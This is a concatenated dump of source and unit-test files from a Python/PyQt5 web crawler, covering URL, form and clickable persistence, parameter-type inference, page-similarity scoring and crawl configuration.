PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
import logging
from copy import deepcopy
from database.database import Database
from models.ajaxrequest import AjaxRequest
from models.clickable import Clickable
from models.clickabletype import ClickableType
from models.form import HtmlForm, FormInput
from models.url import Url
from models.webpage import WebPage

__author__ = 'constantin'

import unittest

# Shared fixtures for all test cases below.
SESSION = 12345
WEBPAGE_ID = 99
TEST_URL1 = "http://example.com"
TEST_URL2 = "http://example.com/exmaple.php"
TEST_HTML = ""
CLICKABLE = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
WEBPAGE = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
AJAXREQUEST = AjaxRequest("GET", TEST_URL1, CLICKABLE, parameters=["test=Test"])


class DataBaseTests(unittest.TestCase):
    """Integration tests for the Database persistence layer.

    NOTE(review): the tests share one backing store name ("DataBaseUnit");
    whether setUp wipes previous contents depends on Database - confirm.
    """

    def setUp(self):
        self.database = Database("DataBaseUnit")


    def test_url_set_and_get(self):
        # An inserted url must come back identical from the crawl queue.
        url = Url(TEST_URL1, depth_of_finding=3)
        self.database.insert_url_into_db(SESSION, url)
        url2 = self.database.get_next_url_for_crawling(SESSION)
        self.assertEqual(url, url2)
        self.assertEqual(url2.depth_of_finding, 3)

    def test_url_visit(self):
        # A visited url must not be handed out for crawling again.
        url1 = Url(TEST_URL1, depth_of_finding=3)
        url2 = Url(TEST_URL2, depth_of_finding=25)

        self.database.insert_url_into_db(SESSION, url1)
        self.database.insert_url_into_db(SESSION, url2)

        url3 = self.database.get_next_url_for_crawling(SESSION)
        self.database.visit_url(SESSION, url3, 25, 200)
        url4 = self.database.get_next_url_for_crawling(SESSION)

        self.assertEqual(url1, url3)
        self.assertEqual(url2, url4)

    def test_url_set(self):
        # Inserting the same url twice must not create a duplicate row.
        url1 = Url(TEST_URL1, depth_of_finding=3)
        url2 = Url(TEST_URL2, depth_of_finding=25)

        self.database.insert_url_into_db(SESSION, url1)
        self.assertEqual(self.database.urls.count(), 1)
        self.database.insert_url_into_db(SESSION, url1)
        self.assertEqual(self.database.urls.count(), 1)
        self.database.insert_url_into_db(SESSION, url2)
        self.assertEqual(self.database.urls.count(), 2)


    def test_clickables(self):
        # Round-trip a clickable, then mark it clicked and check the update.
        clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
        self.database._insert_clickable_into_db(SESSION, WEBPAGE_ID, clickable1)

        clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(len(clickables), 1)
        self.assertEqual(clickable1, clickables[0])

        self.database.set_clickable_clicked(SESSION, WEBPAGE_ID, clickable1.dom_address, clickable1.event, clickable_depth=243, clickable_type=ClickableType.CreatesNewNavigatables)

        clickables = self.database.get_all_clickables_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(len(clickables), 1)
        clickable1.clicked = True
        clickable1.clickable_type = ClickableType.CreatesNewNavigatables
        self.assertEqual(clickable1, clickables[0])

    def test_webpage(self):
        # A stored page must be retrievable both by id and by url.
        clickable1 = Clickable("click", "a", "body/div/div/a", id = "Test1", html_class = "Test2", clickable_depth = 243, function_id = "Test3")
        web_page = WebPage(1, url= TEST_URL1, html= TEST_HTML, cookiesjar= None, depth= 24, base_url= TEST_URL2)
        web_page.clickables.extend([clickable1])
        self.database.insert_page_into_db(SESSION, web_page)
        web_page1 = self.database.get_webpage_to_id_from_db(SESSION, 1)
        self.assertEqual(web_page.toString(), web_page1.toString())
        web_page2 = self.database.get_webpage_to_url_from_db(SESSION, TEST_URL1)
        self.assertEqual(web_page.toString(), web_page2.toString())

    def test_form1(self):
        # Round-trip a form with two inputs.
        form_input1 = FormInput("INPUT", "Username", input_type="text", values=None)
        form_input2 = FormInput("INPUT", "Password", input_type="password", values=None)
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)

        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)
        form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)
        self.assertEqual(form, form1[0])
        self.assertEqual(form.toString(), form1[0].toString())

    def test_similar_forms(self):
        # Forms with identical input names must be merged into one record.
        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas, Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)


        expected_form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)[0]
        self.assertEqual(form1.toString(), expected_form.toString())

    def test_not_similar_forms(self):
        # Forms with different input names must be stored separately.
        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
        form_input2 = FormInput("INPUT", "Test3", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 1)

        form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
        form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
        form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
        self.database.insert_form(SESSION,form, WEBPAGE_ID)
        self.assertEqual(self.database.forms.count(), 2)

    def test_web_page_extend_ajax(self):
        # Ajax requests attached later must show up on the persisted page.
        web_page = deepcopy(WEBPAGE)
        clickable = deepcopy(CLICKABLE)
        web_page.clickables.extend([clickable])
        self.database.insert_page_into_db(SESSION, web_page)
        ajax = deepcopy(AJAXREQUEST)
        self.database.extend_ajax_requests_to_webpage(SESSION, web_page, [ajax])

        web_page.ajax_requests = [ajax]
        test_page = self.database.get_webpage_to_url_from_db(SESSION, web_page.url)
        self.assertEqual(web_page.toString(),test_page.toString())
        self.assertEqual(web_page.ajax_requests[0], ajax)



if __name__ == '__main__':
    unittest.main()
from database.databasemanager import DatabaseManager
# ParameterType is re-exported via models.urlstructure (it imports it from
# models.parametertype).
from models.urlstructure import ParameterType
from utils.domainhandler import DomainHandler
from utils.user import User

__author__ = 'constantin'

import unittest


class DomainHandlerTest(unittest.TestCase):
    """Tests for DomainHandler's parameter-type inference and url handling."""

    def setUp(self):
        self.persistence_manager = DatabaseManager(User("DummyUser", 0))
        self.domain_handler = DomainHandler("example.com", self.persistence_manager)

    def test_a_parameter_calculation(self):
        # calculate_new_url_type(old_type, value) widens the previously seen
        # type with a newly observed value; None means "first observation".
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "4"), ParameterType.Digit)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "afd"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "1.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(None, "42342"), ParameterType.Integer)
        # Widening from Digit:
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "1"), ParameterType.Digit)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "12"), ParameterType.Integer)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "42.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc123"), ParameterType.AlphaNumerical)
        # Widening from Float:
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "a"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc123"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17.5"), ParameterType.Float)
        # Widening from Integer:
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "a"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14"), ParameterType.Integer)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14.5"), ParameterType.Float)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "abc123"), ParameterType.AlphaNumerical)
        # Widening from Char:
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "a"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "4"), ParameterType.Char)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14.5"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc123"), ParameterType.AlphaNumerical)
        # Widening from String:
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "a"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc"), ParameterType.String)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "1"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "2.3"), ParameterType.AlphaNumerical)
        self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc123"), ParameterType.AlphaNumerical)


    def test_b_create_url_function(self):
        # handle_url must parse an absolute url, persist its structure and
        # classify each parameter.
        url = self.domain_handler.handle_url("http://example.com/test.php?a=5&b=abc")
        url_desc = self.persistence_manager.get_url_structure(url.url_hash)
        self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.String)
        self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
        self.assertEqual(url.get_values_to_parameter("a")[0], "5")
        self.assertEqual(url.get_values_to_parameter("b")[0], "abc")


        # A relative url is resolved against the given base url.
        url = self.domain_handler.handle_url("test.php?a=7&b=abc123", "http://example.com")
        url_desc = self.persistence_manager.get_url_structure(url.url_hash)
        self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.AlphaNumerical)
        self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
        self.assertEqual(url.domain, "example.com")
        self.assertEqual(url.path, "/test.php")
        self.assertEqual(url.scheme, "http")
        self.assertEqual(len(url.parameters), 2)
        self.assertEqual(url.get_values_to_parameter("a")[0], "7")
        self.assertEqual(url.get_values_to_parameter("b")[0], "abc123")

        # Unknown parameters raise KeyError.
        with self.assertRaises(KeyError):
            url.get_values_to_parameter("zzz")



if __name__ == '__main__':
    unittest.main()
16 | ''' 17 | import logging 18 | from models.asyncrequeststructure import AsyncRequestStructure 19 | from models.parametertype import ParameterType 20 | from utils.utils import calculate_new_parameter_type 21 | 22 | 23 | 24 | class AsyncRequestHandler(): 25 | 26 | def __init__(self, database_manager): 27 | self.database_manager = database_manager 28 | 29 | def handle_requests(self, web_page): 30 | for async_request in web_page.ajax_requests + web_page.timing_requests: 31 | request_hash = async_request.request_hash 32 | ajax_structure = self.database_manager.get_asyncrequest_structure(request_hash) 33 | if ajax_structure is None: 34 | new_parameters = {} 35 | parameters = async_request.parameters 36 | try: 37 | for key, value in parameters.items(): 38 | param_type = calculate_new_parameter_type(None, value) 39 | new_parameters[key] = {"parameter_type": param_type.value} 40 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters) 41 | except AttributeError: 42 | async_request.request_structure = AsyncRequestStructure(request_hash, None) 43 | else: 44 | new_parameters = {} 45 | if async_request.parameters is not None: 46 | try: 47 | for key, value in async_request.parameters.items(): 48 | param_type = calculate_new_parameter_type(ParameterType(ajax_structure.parameters[key]['parameter_type']), value) 49 | new_parameters[key] = {"parameter_type": param_type.value} 50 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters) 51 | except AttributeError: 52 | logging.error("AttributeError with request: {}, Key: {}, Value: {}".format(request_hash, key, value)) 53 | async_request.request_structure = ajax_structure 54 | except KeyError: 55 | logging.debug("KeyError with request: {}, Key: {}, Value: {}".format(request_hash, key, value)) 56 | async_request.request_structure = ajax_structure 57 | else: 58 | async_request.request_structure = ajax_structure 59 | return web_page 60 | 61 | 62 | 63 | 64 | 
-------------------------------------------------------------------------------- /crawler/utils/config.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | This class contains everything that is important for a crawl session: 18 | - name 19 | - start_page - is the start page, where the crawler should start 20 | - max_depth - How deep the crawler should go 21 | - max_click_depth - How deep a crawler should click 22 | - speed - interaction speed between Jäk and JS 23 | 24 | ''' 25 | from models.utils import CrawlSpeed 26 | 27 | class CrawlConfig(): 28 | 29 | def __init__(self, name, start_page, max_depth = 5, max_click_depth = 5, crawl_speed=CrawlSpeed.Medium): 30 | self.name = name 31 | self.max_depth = max_depth 32 | self.max_click_depth = max_click_depth 33 | self.start_page_url = start_page 34 | self.process_speed = crawl_speed 35 | 36 | 37 | 38 | class AttackConfig(): 39 | """ 40 | Right now more a dummy than something usefull 41 | """ 42 | def __init__(self, start_page_url, crawl_speed=CrawlSpeed.Medium): 43 | attack = "XSS" 44 | self.start_page_url = start_page_url 45 | self.process_speed = crawl_speed 46 | 47 | -------------------------------------------------------------------------------- /crawler/utils/execptions.py: 
-------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class LoginFormNotFound(Exception): 19 | def __init__(self, value): 20 | self.value = value 21 | def __str__(self): 22 | return repr(self.value) 23 | 24 | class PageNotFound(Exception): 25 | def __init__(self, value): 26 | self.value = value 27 | def __str__(self): 28 | return repr(self.value) 29 | 30 | class LoginFailed(Exception): 31 | def __init__(self, value): 32 | self.value = value 33 | def __str__(self): 34 | return repr(self.value) 35 | 36 | class ElementNotFound(Exception): 37 | def __init__(self, value): 38 | self.value = value 39 | def __str__(self): 40 | return repr(self.value) 41 | 42 | class DomainHandlerNotSet(Exception): 43 | def __init__(self, value): 44 | self.value = value 45 | def __str__(self): 46 | return repr(self.value) 47 | -------------------------------------------------------------------------------- /crawler/utils/requestor.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | 
any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from time import time, sleep 19 | import logging 20 | 21 | from PyQt5.Qt import QEventLoop, QTimer, QUrl 22 | 23 | from core.interactioncore import InteractionCore 24 | from models.utils import CrawlSpeed 25 | 26 | 27 | class Requestor(InteractionCore): 28 | def __init__(self, parent, proxy, port, crawl_speed = CrawlSpeed.Medium): 29 | super(Requestor, self).__init__(parent, proxy, port, crawl_speed) 30 | self.app = parent.app 31 | 32 | def _loadFinished(self, resutl): 33 | #logging.debug("{} Subframes found".format(self.mainFrame().childFrames())) 34 | #logging.debug(self.mainFrame().toHtml()) 35 | pass 36 | 37 | def get(self, qurl, html=None, num_retries=1, delay = 10, timeout = 10): 38 | t1 = time() 39 | 40 | loop = QEventLoop() 41 | timer = QTimer() 42 | timer.setSingleShot(True) 43 | timer.timeout.connect(loop.quit) 44 | self.loadFinished.connect(loop.quit) 45 | if qurl: 46 | if html: 47 | self.setHtml(html, qurl) 48 | else: 49 | self.mainFrame().load(QUrl(qurl)) 50 | timer.start(timeout * 1000) 51 | loop.exec_() # delay here until download finished or timeout 52 | 53 | if timer.isActive(): 54 | # downloaded successfully 55 | timer.stop() 56 | self._wait(delay - (time() - t1)) 57 | parsed_html = self.mainFrame().toHtml() 58 | else: 59 | # did not download in time 60 | if num_retries > 0: 61 | logging.debug('Timeout - retrying') 62 | parsed_html = self.get(qurl, num_retries=num_retries-1, timerout=timeout, delay=delay) 63 | else: 64 | logging.debug('Timed out') 65 | parsed_html = '' 66 | self.mainFrame().setHtml(None) 67 | return parsed_html 68 | 69 | def 
_wait(self, timeout=1, pattern=None): 70 | """Wait for delay time 71 | """ 72 | deadline = time() + timeout 73 | while time() < deadline: 74 | sleep(0) 75 | self.app.processEvents() 76 | 77 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 78 | logging.debug("Console: " + message + " at: " + str(lineNumber)) 79 | 80 | def __del__(self): 81 | pass -------------------------------------------------------------------------------- /crawler/utils/user.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | 18 | This class contains everything, that is important for a user. It specifies, mainly the login behaviour. 19 | Notice: A crawl session(one config) can have multiple users 20 | - username - for identifying later the user 21 | - user_level - can be interesting for later comparison for different views 22 | - url_with_login_form - what can that be?? 
23 | - login_data = dict, that contains mainly username and password 24 | 25 | ''' 26 | 27 | import uuid 28 | 29 | 30 | class User(): 31 | 32 | def __init__(self, username, user_level, url_with_login_form=None, login_data=None, session=uuid.uuid4()): 33 | self.login_data = login_data 34 | self.username = username 35 | self.url_with_login_form = url_with_login_form 36 | self.user_level = user_level 37 | self.session = session -------------------------------------------------------------------------------- /crawler/utils/utils.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 
16 | ''' 17 | 18 | 19 | import logging 20 | import string 21 | from Cython.Compiler.Options import normalise_encoding_name 22 | from PyQt5.QtCore import QUrl 23 | from PyQt5.QtNetwork import QNetworkCookie 24 | 25 | from models.deltapage import DeltaPage 26 | from models.parametertype import ParameterType 27 | 28 | 29 | def form_to_dict(form, key_values = None): 30 | result = {} 31 | QStr 32 | for elem in form.parameter: 33 | if elem.name == "redirect_to": 34 | continue 35 | if elem.name not in key_values: 36 | result[elem.name] = elem.values 37 | else: 38 | result[elem.name] = key_values[elem.name] 39 | return result 40 | 41 | 42 | #substract the page-parameters in the parent-class from the delta-class 43 | def subtract_parent_from_delta_page(parent_page, delta_page): 44 | result = DeltaPage(delta_page.id, delta_page.url, delta_page.html, cookiesjar=delta_page.cookiejar, depth=delta_page.current_depth, generator=delta_page.generator, parent_id=delta_page.parent_id) 45 | result.delta_depth = delta_page.delta_depth 46 | for link in delta_page.links: 47 | if link not in parent_page.links: 48 | result.links.append(link) 49 | 50 | for d_clickable in delta_page.clickables: 51 | clickable_is_already_in_main = False 52 | for m_clickable in parent_page.clickables: 53 | if d_clickable == m_clickable: 54 | clickable_is_already_in_main = True 55 | break 56 | if clickable_is_already_in_main == False: 57 | result.clickables.append(d_clickable) 58 | 59 | for d_form in delta_page.forms: 60 | form_is_already_in_main = False 61 | for m_form in parent_page.forms: 62 | if two_forms_are_equal(d_form, m_form): 63 | form_is_already_in_main = True 64 | break 65 | if form_is_already_in_main == False: 66 | result.forms.append(d_form) 67 | 68 | result.ajax_requests = delta_page.ajax_requests # They are just capturing the new one 69 | return result 70 | 71 | def transfer_clicked_from_parent_to_delta(parent_page, delta_page): 72 | for d_clickabe in delta_page.clickables: 73 | if not 
d_clickabe.clicked: 74 | for p_clickable in parent_page.clickables: 75 | if d_clickabe == p_clickable: 76 | d_clickabe.clicked = p_clickable.clicked # If both are equel, transfer the clickstate from parent to child 77 | 78 | return delta_page 79 | 80 | def calculate_similarity_between_pages(page1, page2, clickable_weight = 1.0, form_weight = 1.0, link_weight = 1.0, verbose= True): 81 | 82 | if page1.toString() == page2.toString(): 83 | return 1.0 84 | 85 | form_similarity = 0.0 86 | identical_forms = 0.0 87 | form_counter = len(page1.forms) + len(page2.forms) 88 | if form_counter > 0: 89 | for p1_form in page1.forms: 90 | is_in_other = False 91 | for p2_form in page2.forms: 92 | if two_forms_are_equal(p1_form, p2_form): 93 | is_in_other = True 94 | break 95 | if is_in_other: 96 | identical_forms += 1.0 97 | form_counter -= 1.0 98 | form_similarity = identical_forms / form_counter 99 | else: 100 | form_weight = 0.0 101 | 102 | link_similarity = 0.0 103 | identical_links = 0.0 104 | link_counter = len(page1.links) + len(page2.links) 105 | if link_counter > 0: 106 | for p1_link in page1.links: 107 | is_in_other = False 108 | for p2_link in page2.links: 109 | if p1_link.url.abstract_url == p2_link.url.abstract_url: 110 | is_in_other = True 111 | break 112 | if is_in_other: 113 | identical_links += 1.0 114 | link_counter -= 1.0 115 | link_similarity = identical_links / link_counter 116 | else: 117 | #logging.debug("Linkweight is 0.0") 118 | link_weight = 0.0 119 | 120 | clickable_similarity = 0.0 121 | identical_clickables = 0.0 122 | clickable_counter = len(page1.clickables) + len(page2.clickables) 123 | if clickable_counter > 0: 124 | for p1_clickable in page1.clickables: 125 | is_in_other = False 126 | for p2_clickable in page2.clickables: 127 | if two_clickables_are_equal(p1_clickable, p2_clickable): 128 | is_in_other = True 129 | break 130 | if is_in_other: 131 | identical_clickables += 1.0 132 | clickable_counter -= 1.0 133 | clickable_similarity = 
identical_clickables / clickable_counter 134 | else: 135 | clickable_weight = 0 136 | 137 | sum_weight = clickable_weight + form_weight + link_weight 138 | similarity= clickable_weight * clickable_similarity + form_weight * form_similarity + link_weight * link_similarity 139 | if sum_weight > 0: 140 | result = similarity / sum_weight 141 | else: 142 | result = 1 143 | if verbose: 144 | f = open("similarities/" + str(page1.id) + " - " + str(page2.id) + ".txt", "w") 145 | f.write(page1.toString()) 146 | f.write(" \n \n ======================================================= \n \n") 147 | f.write(page2.toString()) 148 | f.write("\n \n ====================Result=========================== \n \n") 149 | f.write("Similarity = " + str(result) + " - Formsimilarity: " + str(form_similarity) + " - Linksimilarity: " + str(link_similarity) + " - Clickablesimilarity: " + str(clickable_similarity)) 150 | f.write("\n Formweight: "+ str(form_weight) + " Formnum: " +str(form_counter) + " - Linkweight: " + str(link_weight) + " Linknum: " + str(link_counter) + " - Clickableweight: " + str(clickable_weight) + " Clickablenum: " + str(clickable_counter) ) 151 | f.close() 152 | #logging.debug("PageID: " + str(page1.id) + " and PageID: " + str(page2.id) + " has a similarity from: " + str(result)) 153 | 154 | return result 155 | 156 | def two_clickables_are_equal(c1, c2): 157 | tmp = c1.event == c2.event and c1.dom_address == c2.dom_address and c1.tag == c2.tag 158 | if c1.clickable_type is not None and c2.clickable_type is not None: 159 | tmp = tmp and c1.clickable_type == c2.clickable_type 160 | return tmp 161 | 162 | def two_forms_are_equal(form1, form2): 163 | return form1.form_hash == form2.form_hash and form1.action.abstract_url == form2.action.abstract_url 164 | 165 | def count_cookies(networkaccess_manager, url): 166 | try: 167 | url = url.toString() 168 | except AttributeError: 169 | url = url 170 | cookiejar = networkaccess_manager.cookieJar() 171 | all_cookies = 
cookiejar.cookiesForUrl(QUrl(url)) 172 | return len(all_cookies) 173 | 174 | 175 | 176 | def calculate_new_parameter_type(current_type, value): 177 | if current_type is None: # When we see it the first time, then we just set this param to None 178 | if len(value) == 1: 179 | if value in string.ascii_lowercase + string.ascii_uppercase + "/": 180 | return ParameterType.Char 181 | elif _is_int(value): 182 | return ParameterType.Digit 183 | elif _is_float(value): 184 | return ParameterType.Float 185 | else: 186 | raise ValueError("Len is one but I have not specified a case for: {}".format(value)) 187 | else: 188 | if _is_int(value): 189 | return ParameterType.Integer 190 | elif _is_float(value): 191 | return ParameterType.Float 192 | elif isinstance(value, str): 193 | if _has_number(value): 194 | return ParameterType.AlphaNumerical 195 | else: 196 | return ParameterType.String 197 | else: 198 | raise ValueError("Is ling but not specified...") 199 | 200 | else: 201 | if current_type == ParameterType.Digit: 202 | return _handle_digit(value) 203 | elif current_type == ParameterType.Float: 204 | return _handle_float(value) 205 | elif current_type == ParameterType.Char: 206 | return _handle_char(value) 207 | elif current_type == ParameterType.Integer: 208 | return _handle_integer(value) 209 | elif current_type == ParameterType.String: 210 | return _handle_string(value) 211 | else: 212 | return ParameterType.AlphaNumerical # One time alphanumerical everytime alphanumerical 213 | 214 | 215 | def _is_int(value): 216 | try: 217 | int(value) 218 | return True 219 | except ValueError: 220 | return False 221 | 222 | def _is_float(value): 223 | try: 224 | float(value) 225 | return True 226 | except ValueError: 227 | return False 228 | 229 | def _has_number(input): 230 | return any(_is_int(char) or _is_float(char) for char in input) 231 | 232 | def _handle_digit(value): 233 | if len(value) == 1: 234 | if _is_int(value): 235 | return ParameterType.Digit 236 | if _is_float(value): 237 
| return ParameterType.Float 238 | if value in string.ascii_uppercase + string.ascii_lowercase: 239 | return ParameterType.Char 240 | else: 241 | if _is_int(value): 242 | return ParameterType.Integer 243 | if _is_float(value): 244 | return ParameterType.Float 245 | else: 246 | return ParameterType.AlphaNumerical 247 | 248 | def _handle_float(value): 249 | if _is_float(value) or _is_int(value): 250 | return ParameterType.Float 251 | if isinstance(value, str): 252 | return ParameterType.AlphaNumerical 253 | else: 254 | raise ValueError("{}".format(value)) 255 | 256 | 257 | def _handle_char(value): 258 | if len(value) == 1: 259 | return ParameterType.Char 260 | else: 261 | return ParameterType.AlphaNumerical 262 | 263 | def _handle_integer(value): 264 | if _is_int(value): 265 | return ParameterType.Integer 266 | elif _is_float(value): 267 | return ParameterType.Float 268 | else: 269 | return ParameterType.AlphaNumerical 270 | 271 | def _handle_string(value): 272 | if _has_number(value): 273 | return ParameterType.AlphaNumerical 274 | else: 275 | return ParameterType.String 276 | 277 | def print_to_file(self, item, filename): 278 | f = open("result/"+filename, "w") 279 | f.write(item) 280 | f.close() --------------------------------------------------------------------------------